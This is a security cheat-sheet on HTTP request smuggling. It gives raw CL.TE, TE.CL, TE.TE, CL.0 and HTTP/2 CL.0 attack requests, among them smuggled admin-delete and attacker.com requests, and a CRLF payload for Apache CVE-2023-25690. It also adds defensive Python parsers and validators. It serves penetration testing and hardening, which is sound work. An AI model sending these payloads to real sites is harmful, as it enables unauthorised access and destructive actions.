# HTTP Request Smuggling

### [Investigation](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#investigation) <a href="#investigation" id="investigation"></a>

Assume the website has the following HTTP specification.

```bash
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin
```

If we replace **"Content-Length"** with **"Transfer-Encoding: chunked"** as follows, the body is sent to the server in chunks. Each chunk is prefixed with its size in bytes, written in hexadecimal (`1d` below is 29 bytes, the length of the form body).

The message is terminated by a chunk of size zero.

```bash
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1d
username=admin&password=admin
0
```

Note that the **Transfer-Encoding** header is not permitted in **HTTP/2**.


### [Exploitation Automatically](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation-automatically) <a href="#exploitation-automatically" id="exploitation-automatically"></a>

Burp Suite has a useful extension for this, **“HTTP Request Smuggler”**.


### [CL.TE (Content-Length . Transfer-Encoding)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#cl.te-\(content-length-.-transfer-encoding\)) <a href="#cl.te-content-length-.-transfer-encoding" id="cl.te-content-length-.-transfer-encoding"></a>

In CL.TE, the front-end server uses the “Content-Length” header and the back-end server uses the “Transfer-Encoding” header.

Send the following request twice.

```bash
POST /item HTTP/1.1
Host: example.com
Content-Length: 9
Transfer-Encoding: chunked

0

EVIL
```

If the response is delayed, request smuggling may be possible.

#### [Exploitation](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation) <a href="#exploitation" id="exploitation"></a>

The front-end server uses the “Content-Length” header, so

```bash
# Content-Length must cover the whole body (84 bytes here, counted with CRLF
# line endings) so that the front-end forwards all of it to the back-end
POST /item HTTP/1.1
Host: example.com
Content-Length: 84
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: example.com
Foo: xGET / HTTP/1.1
Host: example.com
```


### [TE.CL (Transfer-Encoding . Content-Length)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#te.cl-\(transfer-encoding-.-content-length\)) <a href="#te.cl-transfer-encoding-.-content-length" id="te.cl-transfer-encoding-.-content-length"></a>

The front-end server uses the **“Transfer-Encoding”** header and the back-end server uses the **“Content-Length”** header.\
Send the following request twice.

If you use Burp Suite, make sure the **“Update Content-Length”** option is unchecked so that Burp Suite does not automatically adjust the Content-Length to match the data being sent.

```bash
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked

4
EVIL
0

```

If the response is delayed, request smuggling may be possible.

#### [Exploitation](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#exploitation-1) <a href="#exploitation-1" id="exploitation-1"></a>

Send the following request twice.

```bash
# 5c (92 bytes) is the length of the chunk from "GPOST" up to and including "x=1"
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

```
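The chunked framing from the Investigation section and the CL.TE / TE.CL disagreement above, as an added example that is not part of the original notes: the two probe requests are parsed once by a Content-Length-only parser and once by a chunked-only parser, and the bytes each one leaves behind on the connection are the prefix the other hop would read as the start of the next request. The request samples are constructed from the notes above.

```python
# Added example, not from the original notes: parse one raw HTTP/1.1 request the
# way a Content-Length-only hop and a chunked-only hop would, and compare what
# each leaves on the connection (the CL.TE / TE.CL desync).

def split_head(raw: bytes):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def consume_by_content_length(raw: bytes):
    """A hop that trusts Content-Length: the body is exactly N bytes."""
    _, headers, body = split_head(raw)
    n = int(headers.get(b"content-length", b"0"))
    if len(body) < n:
        return None, b""            # incomplete: the hop keeps waiting
    return body[:n], body[n:]       # (body, leftover bytes on the socket)

def consume_by_chunked(raw: bytes):
    """A hop that trusts Transfer-Encoding: chunked (no trailer support)."""
    _, headers, body = split_head(raw)
    out, pos = b"", 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            return None, b""        # chunk-size line not complete yet
        size = int(body[pos:end].split(b";")[0], 16)   # hex size, drop extensions
        pos = end + 2
        if size == 0:               # last-chunk must be followed by an empty line
            if body[pos:pos + 2] != b"\r\n":
                return None, b""
            return out, body[pos + 2:]
        if len(body) < pos + size + 2:
            return None, b""        # chunk data not complete yet
        out += body[pos:pos + size]
        pos += size + 2             # skip the data and its trailing CRLF

def desync(raw: bytes):
    """Bytes each parser leaves behind as the start of the *next* request."""
    return {"cl_leftover": consume_by_content_length(raw)[1],
            "te_leftover": consume_by_chunked(raw)[1]}

# Constructed samples: the CL.TE and TE.CL probe requests from the notes above.
CL_TE = (b"POST /item HTTP/1.1\r\nHost: example.com\r\nContent-Length: 9\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nEVIL")
TE_CL = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 3\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n4\r\nEVIL\r\n0\r\n\r\n")
```

A hop that returns a non-empty leftover is the one whose view of the message boundary differs from the other's; a safe deployment makes both hops reject or normalise such requests rather than forward them.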


### [TE.TE (Transfer-Encoding . Transfer-Encoding)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#te.te-\(transfer-encoding-.-transfer-encoding\)) <a href="#te.te-transfer-encoding-.-transfer-encoding" id="te.te-transfer-encoding-.-transfer-encoding"></a>

Both the front-end server and the back-end server support the **“Transfer-Encoding”** header, but one of them can be induced not to process it by obfuscating the header, for example:

```bash
Transfer-Encoding: xchunked

Transfer-Encoding: chunked
Transfer-Encoding: x
```
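The defensive counterpart to the obfuscation variants above, as an added example that is not part of the original notes: a strict framing-header check that a reverse proxy or gateway can apply before forwarding. It rejects Content-Length together with Transfer-Encoding (CL.TE / TE.CL), any Transfer-Encoding value other than the exact `chunked` token, duplicated or conflicting framing headers (TE.TE), and whitespace before the colon. The sample request heads are constructed.

```python
# Added example, not part of the original notes: strict framing-header validation
# a proxy can run before forwarding a request. Policy: at most one framing
# mechanism, exactly one Transfer-Encoding header whose value is the single
# token "chunked", numeric and non-conflicting Content-Length, RFC 7230 header
# names with no whitespace before the colon.
import re

TCHAR = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")   # RFC 7230 token chars

def framing_violation(head: bytes):
    """Return why the request head must be rejected, or None if framing is unambiguous."""
    cls, tes = [], []
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        if not line:
            continue
        name, sep, value = line.partition(b":")
        if not sep or not TCHAR.fullmatch(name):   # e.g. 'Transfer-Encoding : chunked'
            return "malformed header line: %r" % line
        name, value = name.lower(), value.strip(b" \t")
        if name == b"content-length":
            cls.append(value)
        elif name == b"transfer-encoding":
            tes.append(value)
    if cls and tes:
        return "both Content-Length and Transfer-Encoding present"
    if len(set(cls)) > 1:
        return "conflicting Content-Length values: %r" % cls
    if cls and not re.fullmatch(rb"[0-9]+", cls[0]):
        return "non-numeric Content-Length: %r" % cls[0]
    if tes:
        # Exactly one header carrying the single coding 'chunked' is accepted;
        # 'xchunked', 'chunked, x' and a second TE header all fail here.
        codings = [c.strip(b" \t") for v in tes for c in v.split(b",")]
        if len(codings) != 1 or codings[0].lower() != b"chunked":
            return "unsupported or obfuscated Transfer-Encoding: %r" % tes
    return None

# Constructed request heads: the two obfuscations shown above plus a clean one.
SAMPLES = [
    b"POST / HTTP/1.1\r\nHost: example.com\r\nTransfer-Encoding: xchunked\r\n",
    b"POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: x\r\n",
    b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 29\r\n",
]
```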


### [CL.0 (Content-Length: 0)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#cl.0-\(content-length%3A-0\)) <a href="#cl.0-content-length-3a-0" id="cl.0-content-length-3a-0"></a>

If the target website ignores the Content-Length header, you may be able to reach a restricted page by request smuggling.

#### [1. Prepare the Two Same Requests](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#1.-prepare-the-two-same-requests) <a href="#id-1.-prepare-the-two-same-requests" id="id-1.-prepare-the-two-same-requests"></a>

If you're using Burp Suite, send the target request to **Repeater** twice.

#### [2. Change the First Request to POST Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#2.-change-the-first-request-to-post-request) <a href="#id-2.-change-the-first-request-to-post-request" id="id-2.-change-the-first-request-to-post-request"></a>

#### [3. Set the "Content-Length: 0" in the First Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#3.-set-the-%22content-length%3A-0%22-in-the-first-request) <a href="#id-3.-set-the-22content-length-3a-0-22-in-the-first-request" id="id-3.-set-the-22content-length-3a-0-22-in-the-first-request"></a>

#### [4. Set the "Connection: keep-alive" in the First Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#4.-set-the-%22connection%3A-keep-alive%22-in-the-first-request) <a href="#id-4.-set-the-22connection-3a-keep-alive-22-in-the-first-request" id="id-4.-set-the-22connection-3a-keep-alive-22-in-the-first-request"></a>

Now the two requests should look like this:

```sh
# Request 1
POST / HTTP/1.1
Host: example.com
Cookie: key=value
Connection: keep-alive
Content-Length: 0

GET /admin/delete?username=john HTTP/1.1
Foo: x

# -------------------------------------------------

# Request 2
GET / HTTP/1.1
Host: example.com
Cookie: key=value
Connection: close
```

#### [5. Send Requests in Order](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#5.-send-requests-in-order) <a href="#id-5.-send-requests-in-order" id="id-5.-send-requests-in-order"></a>

First off, if you're using Burp Suite, make sure the **“Update Content-Length” option in Burp Repeater is enabled.** Send Request 1 first, then Request 2.


### [HTTP/2 CL.0 (Content-Length: 0)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#http%2F2-cl.0-\(content-length%3A-0\)) <a href="#http-2f2-cl.0-content-length-3a-0" id="http-2f2-cl.0-content-length-3a-0"></a>

#### [1. Prepare Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#1.-prepare-request) <a href="#id-1.-prepare-request" id="id-1.-prepare-request"></a>

If you're using Burp Suite, **disable “Update Content-Length” and enable “Allow HTTP/2 ALPN override” in the Burp Repeater options.**

The request should look like this:

```sh
POST / HTTP/2
Host: example.com
Content-Length: 0

GET /exploit HTTP/1.1
Host: attacker.com
Content-Length: 5

x=1
```

#### [2. Send Request](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#2.-send-request) <a href="#id-2.-send-request" id="id-2.-send-request"></a>

Before sending, don't forget to **expand the Inspector on the right in Repeater and select "HTTP/2".**\
Now send the request a few times.


### [mod\_proxy Misconfiguration on Apache 2.4.0 through 2.4.55 (CVE-2023-25690)](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#mod_proxy-misconfiguration-on-apache-%E2%89%A52.4.0%2C-2.4.55%E2%89%A4\(cve-2023-25690\)) <a href="#mod_proxy-misconfiguration-on-apache-e2-89-a52.4.0-2c-2.4.55-e2-89-a4-cve-2023-25690" id="mod_proxy-misconfiguration-on-apache-e2-89-a52.4.0-2c-2.4.55-e2-89-a4-cve-2023-25690"></a>

Reference: <https://github.com/dhmosfunk/CVE-2023-25690-POC>

If the target web server uses a `RewriteRule` (or `ProxyPassMatch`) with an unrestricted pattern such as `(.*)` that captures part of the user-supplied request target and re-inserts it into the proxied request target, HTTP request smuggling is possible.

```bash
RewriteEngine on
RewriteRule "^/products/(.*)" "http://127.0.0.1:8080/?productId=$1" [P]
ProxyPassReverse "/" "http://127.0.0.1:8080/"
```

#### [Send Request with CRLF (`\r\n`) Injection](https://exploit-notes.hdks.org/exploit/web/security-risk/http-request-smuggling/#send-request-with-crlf-\(%5Cr%5Cn\)-injection) <a href="#send-request-with-crlf-5cr-5cn-injection" id="send-request-with-crlf-5cr-5cn-injection"></a>

```bash
GET /products/1%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1

# It means the following:
#
# GET /products/1 HTTP/1.1
# Host: 127.0.0.1
#
# GET /SMUGGLED HTTP/1.1
```
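A simplified model of the misconfiguration above, as an added example that is not from the original notes or the referenced PoC: it shows how the weak rule re-inserts the decoded capture into the proxied request target, counts how many requests the back-end would parse from the result, and applies the input check a hardened deployment (an anchored pattern such as `^/products/([0-9]+)$`) enforces instead. It assumes Apache's default DOTALL regex compilation (mirrored with `re.DOTALL`) and reduces the proxied request to a request line and Host header; the request targets are constructed from the page.

```python
# Added example, not from the original notes or the referenced PoC: a simplified
# model of how the RewriteRule above re-inserts the decoded capture into the
# proxied request-target, plus the input check a hardened deployment applies.
# Assumption: Apache compiles RewriteRule patterns with DOTALL by default,
# mirrored here with re.DOTALL; the proxied request is reduced to a request
# line and a Host header.
import re
from urllib.parse import unquote

WEAK_RULE = re.compile(r"^/products/(.*)", re.DOTALL)   # pattern from the config above
BACKEND = "127.0.0.1:8080"

def proxied_bytes(request_target: str):
    """What the weak rule forwards to the back-end for one request-target (model)."""
    m = WEAK_RULE.match(unquote(request_target))   # mod_rewrite matches the decoded path
    if not m:
        return None
    return f"GET /?productId={m.group(1)} HTTP/1.1\r\nHost: {BACKEND}\r\n\r\n".encode()

def request_count(wire: bytes) -> int:
    """Number of request lines the back-end will parse out of the forwarded bytes."""
    return sum(1 for part in wire.split(b"\r\n\r\n")
               if re.match(rb"[A-Z]+ \S+ HTTP/1\.[01]\r\n", part + b"\r\n"))

def capture_is_safe(request_target: str) -> bool:
    """Hardened check: the decoded capture must be a bare product id, which is
    what anchoring the pattern (^/products/([0-9]+)$) enforces; CR, LF and
    spaces can then never reach the proxied request-target."""
    m = WEAK_RULE.match(unquote(request_target))
    return m is not None and re.fullmatch(r"[0-9]+", m.group(1)) is not None

# Constructed request-targets: a normal one and the CRLF payload shown above.
NORMAL = "/products/1"
PAYLOAD = "/products/1%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED"
```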

### References

* <https://portswigger.net/web-security/request-smuggling>
